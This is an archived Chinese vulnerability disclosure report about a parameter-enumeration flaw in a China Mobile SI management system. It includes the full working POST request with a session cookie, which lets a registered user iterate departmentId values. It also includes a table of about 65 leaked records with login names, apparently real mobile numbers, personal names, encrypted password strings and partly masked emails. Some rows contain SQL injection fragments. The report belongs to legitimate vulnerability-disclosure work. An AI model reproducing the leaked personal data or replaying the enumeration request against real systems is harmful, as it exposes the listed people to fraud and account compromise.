中国移动si业务管理系统漏洞可影响大量用户信息(账号/姓名/手机/邮箱/密码等)

编号215025
Urlhttp://www.wooyun.org/bug.php?action=view&id=215025
漏洞状态已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞标题中国移动si业务管理系统漏洞可影响大量用户信息(账号/姓名/手机/邮箱/密码等)
漏洞类型设计缺陷/逻辑错误
厂商中国移动
白帽子BMa
提交日期2016-06-01 14:04:00
公开日期2016-07-18 10:50:00
修复时间(not set)
确认时间2016-06-03 00:00:00
Confirm Spend2
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank7
漏洞简介
泄露用户所有信息、账号、姓名、手机、邮箱、密码
漏洞细节

注册个账号后,http://**.**.**.**/si/portal/register.jsp

3.png


然后有这么一个请求

POST /server/auth/findDepartment.action HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/si/auth/individual/modifyInfo.jsp
Content-Length: 81
Cookie: JSESSIONID=1A377EC122C2A8227B6A7CF45563F33D
X-Forwarded-For: **.**.**.**
Connection: close
department.departmentId=1016481&ticket=1A377EC122C2A8227B6A7CF45563F33D&domain=si


然后可以遍历

1.png


泄露的信息,

2.png


Payload	"loginName":"	"mobile":"	"password":"	"realName":"	"email":"	Comment
1016621 进学科技 18813396658 CeISzPMC2oO4nU9WFUNQ\/Q== 进学科技 [email protected]**.**.**.**
1016301 讯宇创世 13621097201 iGlWz5LuREiprjVCAiHbiA== 北京讯宇创世科技有限公司 [email protected]**.**.**.**
1016681 测试1006 15815352980 ZDIaYXYBbhr8cpDG5tY+8Q== 测试账号 [email protected]**.**.**.**
1016723 泉龙达科技 13516205707 KJbjdP5gykFLm0JWvvWUzg== quanlongda [email protected]**.**.**.**
1016722 泉龙达 13516205707 7lc6DxnLTqqVJMY+wZVgOg== quanlongda [email protected]**.**.**.**
1016421 企业闪信-景心 15022201502 qHg+qyGTkbDWbP2gxyVccw== 裴玲艳 [email protected]**.**.**.**
1016781 zhubing1225 13668676669 P9nDLMzDErI69q4hVisVQw== 122500 [email protected]**.**.**.**
1016161 zhongxingwangka 13602128111 Y4V1f1qAiVE+OF7bgS8LNg== zhongxingwangka [email protected]**.**.**.**
1016361 zhaoxfa 18832684116 7X110ojWIOFodjucaMA\/lQ== 赵小飞 [email protected]**.**.**.**
1015901 zhangwei 15218848009 6QwNLmgNjG69\/1M\/8klGbA== zhangwei [email protected]**.**.**.**' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL--
1015841 z123456 18896724354 o9vP55LnoGaqBWQVy3qmnA== z123456 [email protected]**.**.**.**
1015922 yanduwei 13911943880 S5dxthIwcYbfpEc9Its39A== yanduwei [email protected]**.**.**.**
1016061 wshh2008 15182011250 ZOzKC39Bp4pXpQj3giWdpQ== haha [email protected]**.**.**.**
1016102 wenhao 13548839276 nQ4E\/Zs2tm4Ocr72v2GR3g== wenhao [email protected]**.**.**.**
1016263 wangqihua 15880229257 QREKrGkgkylK61Mcy209WQ== 中国移动通信福建有限公司 [email protected]**.**.**.**
1016541 tjsckj 13622132507 GgLpX94IDfj7ZF\/DlE0uNQ== shengchuang [email protected]**.**.**.**
1016121 tester017 13148375348 ixs3lKoOJQT3Hxu6hRgZTg== tester017 [email protected]**.**.**.**
1016463 test2 15294567856 rX\/QAx5z67PYIq6XIPjqpg== test2 [email protected]**.**.**.**
1015881 test123456 13434231234 XsS48YTyTRBeUcespeyHvg== masaya [email protected]**.**.**.**
1015941 test1 15034518061 4uieWn2tMmSiIX8omL14Pw== 发送到 [email protected]**.**.**.**
1016701 szsqld 13554915786 Y7v2SyFEqFG1eufU1sXVYA== 深圳市泉龙达科技发展有限公司 135549157[email protected]**.**.**.**
1016783 sunzhix 15263321415 K\/Zo5bqjwKhmFEkFCG13Pg== 孙志祥 [email protected]**.**.**.**
1016721 slyslan 15060316212 8gB+t71sH8eWIKk4XYVNww== slyslan [email protected]**.**.**.**
1016201 sis1975 13904513134 Q8kPHlN2XNdd86iPRUrcIg== 网络运营 [email protected]**.**.**.**
1016801 sim_admin 13718580212 944t\/HSlXQWSado+0S65Ig== sunyu [email protected]**.**.**.**
1016401 shenhongjian 13967225961 7OC3UfnoeZdzrWeMamdqUA== shenhongjian [email protected]**.**.**.**
1016822 nstest2 13811111111 i4ZCznTk8jYEE8U5UeFFHQ== nstest2 [email protected]**.**.**.**
1016821 nstest 13811111111 vj3dBP1vke26OaY035OU2Q== nstest2 [email protected]**.**.**.**
1015782 nbl1986 15000554866 V1McDH8ucD8cSJnCkIHhnQ== 1 [email protected]**.**.**.**
1016841 mykjava2 13825612079 kF4uWtkMQWpgr24YrOLUHw== mykjava2 [email protected]**.**.**.**
1016181 lywswyk 13583108972 Cy\/kwQ8fPM6VdWW0EAR2Aw== lywswyk [email protected]**.**.**.**
1016601 loveCS1763 13528212007 bZYR3bAiKD8mnWjVWm6IJQ== loveCS1763 [email protected]
1016521 lirk.jsyt 13956325007 pjenJK3ie5ADYbMJPJQ4SQ== jeoco_lirk [email protected]**.**.**.**
1016381 kissxxzz 13911139733 Qt3leMO0Xbx+9HQv\/2RfWA== hlj [email protected]**.**.**.**
1016661 jiaoxiang 18252121859 rgCNC+6JsRER7V2Ih9+oZg== jiaoxiang [email protected]**.**.**.**
1015981 jiangsenxing 15961705638 9oDaCo20G5XHm70+RHsfiw== 蒋森兴 [email protected]**.**.**.**
1016281 hujiashun 18858360175 4z0q16ok0ljeAoG8dEuFww== hujiashun [email protected]**.**.**.**
1016441 hubeillwy 13995777715 FG7VXATANx29\/Lizvv5jcw== 湖北联利伟业 [email protected]**.**.**.**
1016561 huangxiaohui 13849612123 GQ6723zegGniaHl\/5IXerg== huangxiaohui [email protected]**.**.**.**
1016782 huanggua 15911111111 xr\/Bxseo87VIvw3A7eBKug== huanggua [email protected]**.**.**.**
1016241 heshiwo 13521202355 fZ3qfNYQZ5PsxaiG7Q\/oAA== heshiwo [email protected]**.**.**.**
1016641 djl1122 15285911190 CIkHWubsPdFDSXY1Xxmg+w== 抢油 [email protected]**.**.**.**
1015801 cla2101 18852486269 Z+e3Zzc6Yh22OnaW7+Ze8g== 书生 [email protected]**.**.**.**
1016101 cj858cj 15010028119 e37s9S4CmnPbM2JQ0Ku2qA== 陈金秋 [email protected]**.**.**.**
1016461 chongfeng 13926600450 NlUEqqQuKLk7mNXqJEeLkA== chongfeng [email protected]**.**.**.**
bma123 18888888888 2wnJ5Ef9RH3a2alWhtKJJQ== 李辉 [email protected]**.**.**.**
1016861 bma123 18888888888 2wnJ5Ef9RH3a2alWhtKJJQ== 李辉 [email protected]**.**.**.**
1015961 ak47 15219118952 Ywr4HoEQE3ZShShgAexIXg== ak47 [email protected]**.**.**.**
1016462 adminaa 15189658965 ijxvJr0NAd8VumT\/io4edA== adminaa [email protected]**.**.**.**
1016262 admin2 15845454545 3N5INq8n64wdMAes78F9Vg== 123 [email protected]**.**.**.**
1016321 admin1 13875467890 OoJxQp8a\/Osl1k7Rwfw33A== 1234532 [email protected]**.**.**.**
1015921 aa17951 15929807202 p6VBBpZ7noQxT05+UazKow== aaqqww [email protected]**.**.**.**
1016042 979091907 13936027352 T5AizXVVPQnxflzuIdXJjg== 李强 [email protected]**.**.**.**
1016581 2766118665 18216678939 6Nr7KvQNnyOO7A6XN6gO3Q== 诸城代理商 [email protected]**.**.**.**
1016001 204930 15049133333 Fv7M4AmS8NsJOvZyuqv\/RA== 204930 [email protected]**.**.**.**
1016041 1q 13843723521 Isv+O\/af0mXsFxFFXmAuOA== q1 [email protected]**.**.**.**
1016761 1979376171 15845317539 XS\/EFF3H+Z+\/L8NwTiuIVQ== Sunday [email protected]**.**.**.**
1016081 18799889778 13899159892 QDjuS2h2mwhrNaRiKlVbuw== 18799889778 [email protected]
1016021 18701256780 15229393711 b7JzgOV3gNp7bYRu4qzbrA== 武三刚 [email protected]**.**.**.**
1015821 18283823693 18283823693 khHcAZllpIHxxA4FgBZoMw== shimin [email protected]**.**.**.**
1016261 15880228257 15845454545 e+LNiQQBEIpF3EuFTgzIwg== admin2' [email protected]**.**.**.**
1016501 15834726140 15834726140 ltDPXYKN59kguPW7jdN\/Kg== 李佳霖 [email protected]
1016221 15138776956 15138776956 sQIowoMKkEalUtSE\/dgAqQ== 谷旭娜 [email protected]**.**.**.**
1016741 13516003391 13516003391 r7Y3VOhGxCwrBRDplDATVQ== z1290421091 [email protected]**.**.**.**
1016141 13479690747 13479690747 VbIVJswIvOwd891tYMuOKw== 承诺 [email protected]**.**.**.**
1015861 13476003630 13476003630 SKQ5Kv1PRPbw3wdq\/s57vA== sgz [email protected]**.**.**.**
1016341 123 13800013800 ZKzJWdQgEP9LW8qI1MfPWA== 123 [email protected]**.**.**.**
1016481 1005011194 15825928568 OFpxWgDuOXocWWm\/dZBiUA== Andy [email protected]**.**.**.**

POC

修复方案

状态信息 2016-06-01: 细节已通知厂商并且等待厂商处理中
2016-06-03: 厂商已经确认,细节仅向厂商公开
2016-06-13: 细节向核心白帽子及相关领域专家公开
2016-06-23: 细节向普通白帽子公开
2016-07-03: 细节向实习白帽子公开
2016-07-18: 细节向公众公开
厂商回复CNVD未复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.
回应信息危害等级:中漏洞Rank:7 确认时间:2016-06-03 10:48
Showing 1-1 of 1 item.
评论内容评论人点赞数评论时间

我一直以为你也是移动的

李旭敏02016-06-03 11:41:00